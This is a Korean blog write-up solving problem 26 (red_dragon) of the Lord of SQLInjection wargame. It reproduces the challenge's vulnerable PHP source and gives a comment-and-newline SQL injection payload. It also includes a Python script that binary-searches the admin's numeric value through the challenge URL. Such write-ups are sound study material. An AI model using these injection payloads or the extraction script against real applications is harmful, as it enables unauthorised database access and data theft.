[ LOS ] Lord of SQLInjection 26번 풀이(red_dragon)
sangjuns
·2022. 1. 14. 00:03
문제소스
query : select id from prob_red_dragon where id='' and no=1
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\./i', $_GET['id'])) exit("No Hack ~_~");
if(strlen($_GET['id']) > 7) exit("too long string");
$no = is_numeric($_GET['no']) ? $_GET['no'] : 1;
$query = "select id from prob_red_dragon where id='{$_GET['id']}' and no={$no}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result['id']}</h2>";
$query = "select no from prob_red_dragon where id='admin'"; // if you think challenge got wrong, look column name again.
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['no'] === $_GET['no']) solve("red_dragon");
highlight_file(__FILE__);
?>
문제 분석 및 페이로드
1. ?id=||no#으로 뒤에를 주석처리, no=%0a로 #주석으로부터 벗어난다.
2. ?id=||no<#&no=%0a100000-> no<100000 이라는 뜻
no을 알아내기 위해 이진탐색 수행
웹은 pwntools가 없이 풀려서 너무 좋다..
역시 리눅스보단 윈도우가 짱..
import requests
import string
URL="https://los.rubiya.kr/chall/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php"
brute=string.digits+string.ascii_letters+string.punctuation
cookies={"PHPSESSID":"kmo07vm0qujgagfi56vspjh5f8"}
passwd=""
print(brute)
length=-1
start=0
end=0xffffffff
while True:
mid=(start+end)//2
query=f"""?id=%27||no<%23&no=%0a{mid}""" #그냥 leng(pw)해주면 guest pw가 4라서 이상하게 나온다.
response=requests.get(URL+query,cookies=cookies)
if start>=end:
print(mid)
break
if "Hello admin" in response.text:
end=mid-1
elif "Hello admin" not in response.text:
start=mid'War Games > Lord of sql injection (LOS)' 카테고리의 다른 글
| [ LOS ] Lord of SQLInjection 27번 풀이(blue_dragon) (0) | 2022.01.14 |
|---|---|
| [ LOS ] Lord of SQLInjection 25번 풀이(green_dragon) (0) | 2022.01.13 |
| [ LOS ] Lord of SQLInjection 24번 풀이(evil_wizard) (0) | 2022.01.13 |
| [ LOS ] Lord of SQLInjection 23번 풀이(hell_fire) (0) | 2022.01.12 |
| [ LOS ] Lord of SQLInjection 22번 풀이(dark_eyes) (2) | 2022.01.12 |
